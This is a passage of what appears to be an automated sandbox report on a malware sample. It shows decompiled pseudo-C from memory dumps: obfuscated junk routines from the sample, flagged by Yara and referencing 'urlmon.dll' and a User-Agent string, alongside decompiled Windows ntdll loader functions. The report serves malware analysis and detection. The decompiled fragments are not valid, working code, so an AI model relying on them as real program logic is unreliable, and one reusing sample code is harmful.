                          0x00ff4030 0x00ff4044 0x00ff4046 0x00ff4046 0x00ff4044 0x00ff4049 0x01048327 0x01048334
                          0x01048339 0x0104833c 0x00ff404f 0x00ff404f 0x00ff404f 0x00ff4051 0x00ff4056 0x00ff4063
                          0x00ff4063 0x00ff4068 0x00000000 0x00ff4068 0x00ff3fdf 0x00ff3fe2 0x00ff3fe4 0x00ff3fe7
                          0x00ff3fef 0x00ff4003 0x00ff4005 0x00ff4005 0x00ff400c 0x00ff4013 0x00ff4016 0x00ff4017
                          0x00ff401b 0x00ff401e 0x00000000 0x00ff401e 0x00ff3fb6 0x00ff3eb1 0x00ff3eb4 0x00ff3eb7
                          0x00ff3ebc 0x010482a9 0x010482ab 0x00ff3ec2 0x00ff3ed3 0x00ff3ed5 0x00ff3ed8 0x00ff3ed8
                          0x00ff3edd 0x010482b3 0x010482b6 0x00000000 0x00ff3ee3 0x00ff3ee8
                          0x00ff3eed
                          0x00ff3ef0
                          0x00ff3ef3
                          0x00ff3f02
                          0x00ff3f05
                          0x00ff3f08
                          0x010482c0
                          0x010482c3
                          0x010482c5
                          0x010482c8
                          0x010482d0
                          0x010482e4
                          0x010482e6
                          0x010482e6
                          0x010482ed
                          0x010482f4
                          0x010482f7
                          0x010482f8
                          0x010482fc
                          0x010482ff
                          0x010482ff
                          0x00ff3f0e
                          0x00ff3f11
                          0x00ff3f16
                          0x00ff3f1d
                          0x00ff3f31
                          0x01048307
                          0x01048307
                          0x00ff3f31
                          0x00ff3f39
                          0x00ff3f48
                          0x00ff3f4d
                          0x00ff3f50
                          0x00ff3f50
                          0x00ff3f53
                          0x00ff3f58
                          0x00ff3f65
                          0x00ff3f65
                          0x00ff3f6a
                          0x00000000
                          0x00ff3f6a
                          0x00ff3edd
                          0x00ff3dda
                          0x00ff3ddd
                          0x00ff3de0
                          0x00ff3de5
                          0x01048245
                          0x00ff3deb
                          0x00ff3df7
                          0x00ff3dfc
                          0x00ff3dfe
                          0x00ff3e01
                          0x00ff3e01
                          0x00ff3e06
                          0x0104824d
                          0x0104824f
                          0x01048254
                          0x00000000
                          0x00ff3e0c
                          0x00ff3e11
                          0x00ff3e16
                          0x00ff3e19
                          0x00ff3e29
                          0x00ff3e2c
                          0x00ff3e2f
                          0x0104825c
                          0x0104825f
                          0x01048261
                          0x01048264
                          0x0104826c
                          0x01048280
                          0x01048282
                          0x01048282
                          0x01048289
                          0x01048290
                          0x01048293
                          0x01048294
                          0x01048298
                          0x0104829b
                          0x0104829b
                          0x00ff3e35
                          0x00ff3e38
                          0x00ff3e3d
                          0x00ff3e44
                          0x00ff3e58
                          0x010482a3
                          0x010482a3
                          0x00ff3e58
                          0x00ff3e60
                          0x00ff3e6f
                          0x00ff3e74
                          0x00ff3e77
                          0x00ff3e77
                          0x00ff3e7a
                          0x00ff3e7f
                          0x00ff3e8c
                          0x00ff3e8c
                          0x00ff3e91
                          0x00000000
                          0x00ff3e91

                          Strings
                          • Kernel-MUI-Language-SKU, xrefs: 00FF3F70
                          • Kernel-MUI-Language-Disallowed, xrefs: 00FF3E97
                          • Kernel-MUI-Language-Allowed, xrefs: 00FF3DC0
                          • Kernel-MUI-Number-Allowed, xrefs: 00FF3D8C
                          • WindowsExcludedProcs, xrefs: 00FF3D6F
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                          • API String ID: 0-258546922
                          • Opcode ID: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                          • Instruction ID: 59592607ab2095f4872ee66d0649f6aece3986748f00292c47ce0f1b97d3c131
                          • Opcode Fuzzy Hash: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                          • Instruction Fuzzy Hash: 1BF15DB2D00219EBCB15DF98C980AEEBBF9FF48750F14406AE645E7261D734AE01DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 33%
                          			E004157D8(signed int __eax, void* __ecx, signed int __edx, void* __fp0) {
                          				signed int _t36;
                          				signed int _t41;
                          				signed char _t43;
                          				signed char _t48;
                          				signed char _t49;
                          				signed char _t51;
                          				void* _t55;
                          				signed char _t60;
                          				signed int _t61;
                          				signed int _t66;
                          				void* _t73;
                          
                          				_t55 = __ecx;
                          				if((__edx &  *(_t73 + __ecx + 0x26)) == 0) {
                          					_t36 = __eax ^ 0x542b733e;
                          					__eflags = _t36;
                          					if(__eflags >= 0) {
                          						_push(_t66);
                          						__eflags = 0;
                          						_push(_t60);
                          						_t61 =  *(_t73 + 0xc);
                          						 *((intOrPtr*)(_t73 - 0x19)) = 0;
                          						 *((char*)(_t73 - 0x15)) = 0;
                          						goto L27;
                          					} else {
                          						asm("adc dl, dl");
                          						goto L22;
                          					}
                          				} else {
                          					asm("les ebp, [ebx]");
                          					_t17 = __eax;
                          					__eax = __esp;
                          					__esp = _t17;
                          					__eflags = __al - 0xa4;
                          					__al =  *0xa4cf642b;
                          					asm("movsb");
                          					__ah = 0xce;
                          					__ebx = 0xc7707ee;
                          					if(__eflags > 0) {
                          						L27:
                          						goto L29;
                          					} else {
                          						__esp = __esp + 1;
                          						_push(__ecx);
                          						__eax = __eax + 1;
                          						__eflags = __eax;
                          						asm("a16 add eax, 0xb69a140");
                          						asm("scasw");
                          						asm("ficomp word [ebp+0x13]");
                          						if(__eflags == 0) {
                          							while(1) {
                          								L7:
                          								asm("out 0x73, al");
                          								while(__eflags > 0) {
                          									__eflags = __eax & 0x9372fc31;
                          									_t13 = __eax;
                          									__eax = __edx;
                          									__edx = _t13;
                          									__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
                          									__eflags = __bh;
                          									__esp = __esp + 1;
                          									_push(ds);
                          									asm("adc [esi], cl");
                          									_push(__ecx);
                          									_push(__ecx);
                          									asm("sti");
                          									asm("faddp st1, st0");
                          									if(__eflags > 0) {
                          										continue;
                          									} else {
                          										asm("das");
                          										if(__eflags < 0) {
                          											L22:
                          											asm("ror byte [ebx], cl");
                          											_t43 = _t60;
                          											_t61 = _t36;
                          											_t23 = _t73 + 0x7f6cb721;
                          											 *_t23 =  *(_t73 + 0x7f6cb721) + _t55;
                          											__eflags =  *_t23;
                          											goto L23;
                          										} else {
                          											_push(ss);
                          											__bh = __bh |  *__ecx;
                          											__eflags = __bh;
                          											if(__eflags >= 0) {
                          												goto L18;
                          											} else {
                          												asm("scasd");
                          												 *0x529d6c8a = __eax;
                          												__al = __al - 0xcc;
                          												asm("cmpsd");
                          												__eflags = __esp - __edi;
                          												if(__eflags >= 0) {
                          													_push(__ebx);
                          													_push(__edi);
                          													__ebx = __ebx + 1;
                          													__ebx = __ebx - 1;
                          													asm("enter 0x90ab, 0xfe");
                          													asm("o16 jge 0x7e");
                          													__dl = 0xe6;
                          													__edx = __edx - 1;
                          													__eflags = __edx;
                          													_t5 = __edx - 0x618a279f;
                          													_t6 = __ah;
                          													__ah =  *_t5;
                          													 *_t5 = _t6;
                          												} else {
                          													 *[cs:ebx+0x72fc0a61] = __dh;
                          													asm("into");
                          													asm("pushad");
                          													_t15 = __eax - 0x6678bb3c;
                          													_t16 = __dl;
                          													__dl =  *_t15;
                          													 *_t15 = _t16;
                          													_pop(ss);
                          													asm("enter 0x3aa, 0xa1");
                          													asm("out dx, eax");
                          												}
                          												asm("popad");
                          												__fp0 = __fp0 /  *(__ebp - 0x62);
                          												__edx =  *(__esi + __edx * 8) * 0x3b;
                          												__edx = __edx - 1;
                          												__edi = 0xf5f30346;
                          												__esi = __ebx;
                          												asm("retf");
                          												_t10 = __eax;
                          												__eax = __ecx;
                          												__ecx = _t10;
                          												asm("int3");
                          												goto L7;
                          											}
                          										}
                          									}
                          									goto L33;
                          								}
                          								_t3 = __ebp - 0x73;
                          								 *_t3 =  *(__ebp - 0x73) << 0x56;
                          								__eflags =  *_t3;
                          							}
                          						} else {
                          							__bh = __bh + __al;
                          							asm("adc al, 0xb1");
                          							__dh = 0xa0;
                          							asm("sbb cl, [esp+ecx*8+0x53]");
                          							asm("repne mov esp, edi");
                          							__al = __al ^ 0x0000006d;
                          							asm("jecxz 0xffffffa7");
                          							__ebx = 0x9a0bfea9;
                          							asm("stc");
                          							__edx = __eax * 0x9a0bfea9 >> 0x20;
                          							__eflags = __eax;
                          							L18:
                          							L23:
                          							if(__eflags > 0) {
                          								 *_t43 =  *_t43 & _t43;
                          								_push(ss);
                          								 *((intOrPtr*)(_t43 + _t55 - 1)) =  *((intOrPtr*)(_t43 + _t55 - 1)) + _t43 + _t55 - 1;
                          								_t33 = _t73 - 0x24; // 0x6d6c7275
                          								__eflags =  *((intOrPtr*)(_t73 + 8)) + 0xc94;
                          								_t66 = E00413E50( *((intOrPtr*)(_t73 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t73 + 8)) + 0xc94,  *((intOrPtr*)(_t73 + 8)) + 0xc94, _t33), 0, 0, 0x69767207);
                          								L29:
                          								asm("lock add esp, 0x28");
                          								__eflags = _t66;
                          								if(_t66 == 0) {
                          									L32:
                          									__eflags = 0;
                          									return 0;
                          								} else {
                          									_t41 =  *_t66(0, E0041A390(_t61) + _t61, _t73 - 4);
                          									__eflags = _t41;
                          									if(_t41 != 0) {
                          										goto L32;
                          									} else {
                          										return 1;
                          									}
                          								}
                          							} else {
                          								_t48 = _t51;
                          								__eflags = _t48 & 0x69453e52;
                          								asm("outsd");
                          								_t49 = _t48 &  *(_t43 - 0x68);
                          								__eflags = _t49;
                          								asm("arpl [eax-0x19cfcce5], di");
                          								asm("loopne 0x32");
                          								return _t49;
                          							}
                          						}
                          					}
                          				}
                          				L33:
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Us$: $er-A$gent$urlmon.dll
                          • API String ID: 0-1367105278
                          • Opcode ID: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                          • Instruction ID: d35fe0e56d5b213ec2a307e6804696366d35cc18aa5b3103ee1b1b76edd744e7
                          • Opcode Fuzzy Hash: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                          • Instruction Fuzzy Hash: 0741BC72805644EEDB01DE519D427EFBFB8EB85724F18001AEC00AB341D33D899687DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E004157AA(void* __eax, signed char __ebx, void* __ecx, void* __edx, signed char __edi, void* __esi, void* __eflags, void* __fp0) {
                          				signed char _t26;
                          				signed int _t34;
                          				signed char _t36;
                          				signed int _t37;
                          				signed char _t39;
                          				void* _t43;
                          				void* _t48;
                          				signed int _t56;
                          				void* _t61;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					_t43 = __ecx;
                          					_t39 = __ebx;
                          					asm("das");
                          					if(__eflags < 0) {
                          						break;
                          					}
                          					L11:
                          					_push(ss);
                          					__bh = __bh |  *__ecx;
                          					__eflags = __bh;
                          					if(__eflags >= 0) {
                          						L14:
                          						L16:
                          						if(__eflags > 0) {
                          							L18:
                          							 *_t26 =  *_t26 & _t26;
                          							_push(ss);
                          							 *((intOrPtr*)(_t26 + _t43 - 1)) =  *((intOrPtr*)(_t26 + _t43 - 1)) + _t26 + _t43 - 1;
                          							_t23 = _t61 - 0x24; // 0x6d6c7275
                          							__eflags =  *((intOrPtr*)(_t61 + 8)) + 0xc94;
                          							_t56 = E00413E50( *((intOrPtr*)(_t61 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t61 + 8)) + 0xc94,  *((intOrPtr*)(_t61 + 8)) + 0xc94, _t23), 0, 0, 0x69767207);
                          							L19:
                          							asm("lock add esp, 0x28");
                          							__eflags = _t56;
                          							if(_t56 == 0) {
                          								L22:
                          								__eflags = 0;
                          								return 0;
                          							} else {
                          								L20:
                          								_t34 =  *_t56(0, E0041A390(_t48) + _t48, _t61 - 4);
                          								__eflags = _t34;
                          								if(_t34 != 0) {
                          									goto L22;
                          								} else {
                          									L21:
                          									return 1;
                          								}
                          							}
                          						} else {
                          							L17:
                          							_t36 = _t39;
                          							__eflags = _t36 & 0x69453e52;
                          							asm("outsd");
                          							_t37 = _t36 &  *(_t26 - 0x68);
                          							__eflags = _t37;
                          							asm("arpl [eax-0x19cfcce5], di");
                          							asm("loopne 0x32");
                          							return _t37;
                          						}
                          					} else {
                          						L12:
                          						asm("scasd");
                          						 *0x529d6c8a = __eax;
                          						__al = __al - 0xcc;
                          						asm("cmpsd");
                          						__eflags = __esp - __edi;
                          						if(__eflags >= 0) {
                          							_push(__ebx);
                          							_push(__edi);
                          							__ebx = __ebx + 1;
                          							__ebx = __ebx - 1;
                          							asm("enter 0x90ab, 0xfe");
                          							asm("o16 jge 0x7e");
                          							__dl = 0xe6;
                          							__edx = __edx - 1;
                          							__eflags = __edx;
                          							_t3 = __edx - 0x618a279f;
                          							_t4 = __ah;
                          							__ah =  *_t3;
                          							 *_t3 = _t4;
                          						} else {
                          							 *[cs:ebx+0x72fc0a61] = __dh;
                          							asm("into");
                          							asm("pushad");
                          							_t13 = __eax - 0x6678bb3c;
                          							_t14 = __dl;
                          							__dl =  *_t13;
                          							 *_t13 = _t14;
                          							_pop(ss);
                          							asm("enter 0x3aa, 0xa1");
                          							asm("out dx, eax");
                          						}
                          						L5:
                          						asm("popad");
                          						__fp0 = __fp0 /  *(__ebp - 0x62);
                          						__edx =  *(__esi + __edx * 8) * 0x3b;
                          						__edx = __edx - 1;
                          						__edi = 0xf5f30346;
                          						__esi = __ebx;
                          						asm("retf");
                          						_t8 = __eax;
                          						__eax = __ecx;
                          						__ecx = _t8;
                          						asm("int3");
                          						L7:
                          						asm("out 0x73, al");
                          						L8:
                          						while(__eflags > 0) {
                          							__eflags = __eax & 0x9372fc31;
                          							_t11 = __eax;
                          							__eax = __edx;
                          							__edx = _t11;
                          							__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
                          							__eflags = __bh;
                          							__esp = __esp + 1;
                          							_push(ds);
                          							asm("adc [esi], cl");
                          							_push(__ecx);
                          							_push(__ecx);
                          							asm("sti");
                          							asm("faddp st1, st0");
                          							if(__eflags > 0) {
                          								continue;
                          							} else {
                          								L10:
                          								goto L0;
                          							}
                          							goto L23;
                          						}
                          						_t1 = __ebp - 0x73;
                          						 *_t1 =  *(__ebp - 0x73) << 0x56;
                          						__eflags =  *_t1;
                          					}
                          					L23:
                          				}
                          				L15:
                          				asm("ror byte [ebx], cl");
                          				_t26 = __edi;
                          				_t48 = __eax;
                          				_t16 = _t61 + 0x7f6cb721;
                          				 *_t16 =  *(_t61 + 0x7f6cb721) + __ecx;
                          				__eflags =  *_t16;
                          				goto L16;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Us$: $er-A$gent$urlmon.dll
                          • API String ID: 0-1367105278
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 44%
                          			E01018E00(void* __ecx) {
                          				signed int _v8;
                          				char _v12;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t32;
                          				intOrPtr _t35;
                          				intOrPtr _t43;
                          				void* _t46;
                          				intOrPtr _t47;
                          				void* _t48;
                          				signed int _t49;
                          				void* _t50;
                          				intOrPtr* _t51;
                          				signed int _t52;
                          				void* _t53;
                          				intOrPtr _t55;
                          
                          				_v8 =  *0x10dd360 ^ _t52;
                          				_t49 = 0;
                          				_t48 = __ecx;
                          				_t55 =  *0x10d8464; // 0x74790110
                          				if(_t55 == 0) {
                          					L9:
                          					if( !_t49 >= 0) {
                          						if(( *0x10d5780 & 0x00000003) != 0) {
                          							E01065510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                          						}
                          						if(( *0x10d5780 & 0x00000010) != 0) {
                          							asm("int3");
                          						}
                          					}
                          					return E0102B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                          				}
                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                          				_t43 =  *0x10d7984; // 0xa92bb8
                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                          					if(_t48 == _t43) {
                          						_t50 = 0x5c;
                          						if( *_t32 == _t50) {
                          							_t46 = 0x3f;
                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                          								_t32 = _t32 + 8;
                          							}
                          						}
                          					}
                          					_t51 =  *0x10d8464; // 0x74790110
                          					 *0x10db1e0(_t47, _t32,  &_v12);
                          					_t49 =  *_t51();
                          					if(_t49 >= 0) {
                          						L8:
                          						_t35 = _v12;
                          						if(_t35 != 0) {
                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                          								E01019B10( *((intOrPtr*)(_t48 + 0x48)));
                          								_t35 = _v12;
                          							}
                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                          						}
                          						goto L9;
                          					}
                          					if(_t49 != 0xc000008a) {
                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                          							if(_t49 != 0xc00000bb) {
                          								goto L8;
                          							}
                          						}
                          					}
                          					if(( *0x10d5780 & 0x00000005) != 0) {
                          						_push(_t49);
                          						E01065510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                          						_t53 = _t53 + 0x1c;
                          					}
                          					_t49 = 0;
                          					goto L8;
                          				} else {
                          					goto L9;
                          				}
                          			}

                          Strings
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105932A
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01059357
                          • minkernel\ntdll\ldrsnap.c, xrefs: 0105933B, 01059367
                          • LdrpFindDllActivationContext, xrefs: 01059331, 0105935D
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 0-3779518884
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E00FF8794(void* __ecx) {
                          				signed int _v0;
                          				char _v8;
                          				signed int _v12;
                          				void* _v16;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v40;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t77;
                          				signed int _t80;
                          				signed char _t81;
                          				signed int _t87;
                          				signed int _t91;
                          				void* _t92;
                          				void* _t94;
                          				signed int _t95;
                          				signed int _t103;
                          				signed int _t105;
                          				signed int _t110;
                          				signed int _t118;
                          				intOrPtr* _t121;
                          				intOrPtr _t122;
                          				signed int _t125;
                          				signed int _t129;
                          				signed int _t131;
                          				signed int _t134;
                          				signed int _t136;
                          				signed int _t143;
                          				signed int* _t147;
                          				signed int _t151;
                          				void* _t153;
                          				signed int* _t157;
                          				signed int _t159;
                          				signed int _t161;
                          				signed int _t166;
                          				signed int _t168;
                          
                          				_push(__ecx);
                          				_t153 = __ecx;
                          				_t159 = 0;
                          				_t121 = __ecx + 0x3c;
                          				if( *_t121 == 0) {
                          					L2:
                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                          							L6:
                          							if(E00FF934A() != 0) {
                          								_t159 = E0106A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                          								__eflags = _t159;
                          								if(_t159 < 0) {
                          									_t81 =  *0x10d5780; // 0x0
                          									__eflags = _t81 & 0x00000003;
                          									if((_t81 & 0x00000003) != 0) {
                          										_push(_t159);
                          										E01065510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                          										_t81 =  *0x10d5780; // 0x0
                          									}
                          									__eflags = _t81 & 0x00000010;
                          									if((_t81 & 0x00000010) != 0) {
                          										asm("int3");
                          									}
                          								}
                          							}
                          						} else {
                          							_t159 = E00FF849B(0, _t122, _t153, _t159, _t180);
                          							if(_t159 >= 0) {
                          								goto L6;
                          							}
                          						}
                          						_t80 = _t159;
                          						goto L8;
                          					} else {
                          						_t125 = 0x13;
                          						asm("int 0x29");
                          						_push(0);
                          						_push(_t159);
                          						_t161 = _t125;
                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                          						_t143 = 0;
                          						_v40 = _t161;
                          						_t118 = 0;
                          						_push(_t153);
                          						__eflags = _t87;
                          						if(_t87 != 0) {
                          							_t118 = _t87 + 0x5d8;
                          							__eflags = _t118;
                          							if(_t118 == 0) {
                          								L46:
                          								_t118 = 0;
                          							} else {
                          								__eflags =  *(_t118 + 0x30);
                          								if( *(_t118 + 0x30) == 0) {
                          									goto L46;
                          								}
                          							}
                          						}
                          						_v32 = 0;
                          						_v28 = 0;
                          						_v16 = 0;
                          						_v20 = 0;
                          						_v12 = 0;
                          						__eflags = _t118;
                          						if(_t118 != 0) {
                          							__eflags = _t161;
                          							if(_t161 != 0) {
                          								__eflags =  *(_t118 + 8);
                          								if( *(_t118 + 8) == 0) {
                          									L22:
                          									_t143 = 1;
                          									__eflags = 1;
                          								} else {
                          									_t19 = _t118 + 0x40; // 0x40
                          									_t156 = _t19;
                          									E00FF8999(_t19,  &_v16);
                          									__eflags = _v0;
                          									if(_v0 != 0) {
                          										__eflags = _v0 - 1;
                          										if(_v0 != 1) {
                          											goto L22;
                          										} else {
                          											_t128 =  *(_t161 + 0x64);
                          											__eflags =  *(_t161 + 0x64);
                          											if( *(_t161 + 0x64) == 0) {
                          												goto L22;
                          											} else {
                          												E00FF8999(_t128,  &_v12);
                          												_t147 = _v12;
                          												_t91 = 0;
                          												__eflags = 0;
                          												_t129 =  *_t147;
                          												while(1) {
                          													__eflags =  *((intOrPtr*)(0x10d5c60 + _t91 * 8)) - _t129;
                          													if( *((intOrPtr*)(0x10d5c60 + _t91 * 8)) == _t129) {
                          														break;
                          													}
                          													_t91 = _t91 + 1;
                          													__eflags = _t91 - 5;
                          													if(_t91 < 5) {
                          														continue;
                          													} else {
                          														_t131 = 0;
                          														__eflags = 0;
                          													}
                          													L37:
                          													__eflags = _t131;
                          													if(_t131 != 0) {
                          														goto L22;
                          													} else {
                          														__eflags = _v16 - _t147;
                          														if(_v16 != _t147) {
                          															goto L22;
                          														} else {
                          															E01002280(_t92, 0x10d86cc);
                          															_t94 = E010B9DFB( &_v20);
                          															__eflags = _t94 - 1;
                          															if(_t94 != 1) {
                          															}
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															 *_t118 =  *_t118 + 1;
                          															asm("adc dword [ebx+0x4], 0x0");
                          															_t95 = E010161A0( &_v32);
                          															__eflags = _t95;
                          															if(_t95 != 0) {
                          																__eflags = _v32 | _v28;
                          																if((_v32 | _v28) != 0) {
                          																	_t71 = _t118 + 0x40; // 0x3f
                          																	_t134 = _t71;
                          																	goto L55;
                          																}
                          															}
                          															goto L30;
                          														}
                          													}
                          													goto L56;
                          												}
                          												_t92 = 0x10d5c64 + _t91 * 8;
                          												asm("lock xadd [eax], ecx");
                          												_t131 = (_t129 | 0xffffffff) - 1;
                          												goto L37;
                          											}
                          										}
                          										goto L56;
                          									} else {
                          										_t143 = E00FF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                          										__eflags = _t143;
                          										if(_t143 != 0) {
                          											_t157 = _v12;
                          											_t103 = 0;
                          											__eflags = 0;
                          											_t136 =  &(_t157[1]);
                          											 *(_t161 + 0x64) = _t136;
                          											_t151 =  *_t157;
                          											_v20 = _t136;
                          											while(1) {
                          												__eflags =  *((intOrPtr*)(0x10d5c60 + _t103 * 8)) - _t151;
                          												if( *((intOrPtr*)(0x10d5c60 + _t103 * 8)) == _t151) {
                          													break;
                          												}
                          												_t103 = _t103 + 1;
                          												__eflags = _t103 - 5;
                          												if(_t103 < 5) {
                          													continue;
                          												}
                          												L21:
                          												_t105 = E0102F380(_t136, 0xfc1184, 0x10);
                          												__eflags = _t105;
                          												if(_t105 != 0) {
                          													__eflags =  *_t157 -  *_v16;
                          													if( *_t157 >=  *_v16) {
                          														goto L22;
                          													} else {
                          														asm("cdq");
                          														_t166 = _t157[5] & 0x0000ffff;
                          														_t108 = _t157[5] & 0x0000ffff;
                          														asm("cdq");
                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                          														if(__eflags > 0) {
                          															L29:
                          															E01002280(_t108, 0x10d86cc);
                          															 *_t118 =  *_t118 + 1;
                          															_t42 = _t118 + 0x40; // 0x3f
                          															_t156 = _t42;
                          															asm("adc dword [ebx+0x4], 0x0");
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															asm("movsd");
                          															_t110 = E010161A0( &_v32);
                          															__eflags = _t110;
                          															if(_t110 != 0) {
                          																__eflags = _v32 | _v28;
                          																if((_v32 | _v28) != 0) {
                          																	_t134 = _v20;
                          																	L55:
                          																	E010B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                          																}
                          															}
                          															L30:
                          															 *_t118 =  *_t118 + 1;
                          															asm("adc dword [ebx+0x4], 0x0");
                          															E00FFFFB0(_t118, _t156, 0x10d86cc);
                          															goto L22;
                          														} else {
                          															if(__eflags < 0) {
                          																goto L22;
                          															} else {
                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                          																	goto L22;
                          																} else {
                          																	goto L29;
                          																}
                          															}
                          														}
                          													}
                          													goto L56;
                          												}
                          												goto L22;
                          											}
                          											asm("lock inc dword [eax]");
                          											goto L21;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						return _t143;
                          					}
                          				} else {
                          					_push( &_v8);
                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                          					_push(__ecx + 0x40);
                          					_push(_t121);
                          					_push(0xffffffff);
                          					_t80 = E01029A00();
                          					_t159 = _t80;
                          					if(_t159 < 0) {
                          						L8:
                          						return _t80;
                          					} else {
                          						goto L2;
                          					}
                          				}
                          				L56:
                          			}
                          Instruction addresses for the listing above (the per-line address column of the decompiler table, detached from the code by extraction): 0x00ff8799 to 0x00ff8996 and 0x01049bfe to 0x01049cc0; entries of 0x00000000 marked lines with no address.

                          Strings
                          • LdrpDoPostSnapWork, xrefs: 01049C1E
                          • minkernel\ntdll\ldrsnap.c, xrefs: 01049C28
                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01049C18
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                          • API String ID: 2994545307-1948996284
                          • Opcode ID: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                          • Instruction ID: 3ceba34ab0b283dc1b4bce1900ab90c69d1003bc1a1573607350b4abb8bb20da
                          • Opcode Fuzzy Hash: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                          • Instruction Fuzzy Hash: 10910672A0021EDFDF28DF59C8C1ABA77B5FF44394B544169EA41AB260DB70ED02DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00FF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				char _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				signed int _t73;
                          				void* _t77;
                          				char* _t82;
                          				char* _t87;
                          				signed char* _t97;
                          				signed char _t102;
